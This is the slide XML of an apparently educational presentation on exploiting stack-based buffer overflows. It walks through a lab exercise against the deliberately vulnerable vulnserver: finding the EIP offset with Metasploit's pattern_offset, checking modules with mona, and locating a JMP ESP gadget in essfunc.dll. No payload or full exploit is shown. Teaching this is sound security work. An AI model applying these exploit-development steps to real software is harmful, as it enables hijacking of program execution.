            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>We then send this random pattern over to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>vulnserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>, and after the crash we look at the value of EIP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>We then query this string using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>pattern_offset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t> script to find the exact number of bytes used to crash the application. We find that our offset is located at 2003 bytes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>$ /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>-framework/tools/exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>pattern_offset.rb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t> -q 386F4337</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FF4C77A-A352-0E4D-6038-EBB38A80E0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127" y="1334297"/>
            <a:ext cx="5012573" cy="1117916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90CBA255-3D8F-2D4E-FCFF-07AE87B672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7127" y="2920735"/>
            <a:ext cx="7889242" cy="1016529"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE4751D0-5BB9-8092-1991-D7D4AC8697C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="5171323"/>
            <a:ext cx="11157319" cy="1172327"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2935224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2729B2-DB0B-BF90-FA54-F7F6160F6905}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Confirming the Offset by Overwriting the EIP:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>We now send 2003 A’s and 4 B’s over to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>vulnserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> and see whether our offset is correct and whether we can overwrite the EIP or not.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" u="sng"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Locating the Application Module with no Memory Protections:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Now we must look for a module within the application that does not have any memory protections. For this purpose we’ll use a python script mona, and load up mona within Immunity Debugger.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>$ !mona modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The first highlighted module has all memory protections disabled.</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34A8495-AF13-15CF-7FBF-7927E6FE83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061966"/>
            <a:ext cx="11662609" cy="1526829"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD9B1EBA-2653-2E51-3ABC-3713A1F81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5" y="4161453"/>
            <a:ext cx="8334375"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397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EAA03F8-F79C-D6DF-ADC8-8B73AA9ED80D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="11883493" cy="3970318"/>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Now we must check whether we can use this module to our advantage. For this purpose, we must check whether the JMP ESP instruction is in this module or not.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>First, we determine the operation-code (or opcode or hex-equivalent) of JMP ESP. we will use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>nasm_shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> for this purpose.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>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usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-framework/tools/exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>nasm_shell.rb</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Inside the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>nasm_shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> prompt, type in JMP ESP and then press enter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>the opcode for JMP ESP is FFE4.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Let us search the application module for this opcode, and we find the instruction address for JMP ESP within this DLL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>$ !mona find -s “\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>\xe4” -m essfunc.dll</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A453812-14A5-F8F8-B22B-24733B5868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526577"/>
            <a:ext cx="11020718" cy="796090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E2C8BDA-B4C1-53FF-2DFA-2DB7B747EA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702" y="3493028"/>
            <a:ext cx="10710344" cy="1301115"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4ADA12B4-92DC-91A9-2B76-F785B3394D0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4794143"/>
            <a:ext cx="12192000" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>JMP ESP' stands for 'Jump to the ESP register,' used in exploiting vulnerabilities. It directs the program to our shellcode on the stack frame. We inject its memory address into EIP, allowing control over program execution. By verifying if EIP points to 'JMP ESP,' we ensure successful control.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="984891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3468</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>360</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Söhne</vt:lpstr>
      <vt:lpstr>source-code-pro</vt:lpstr>
      <vt:lpstr>source-serif-pro</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Exploiting Stack-Based Buffer Overflows with Metasploit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Exploiting Stack-Based Buffer Overflows with Metasploit </dc:title>
  <dc:creator>Subhashis Tripathy</dc:creator>
  <cp:lastModifiedBy>Subhashis Tripathy</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-03-01T13:48:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-01T18:03:10Z</dcterms:modified>
</cp:coreProperties>
</file>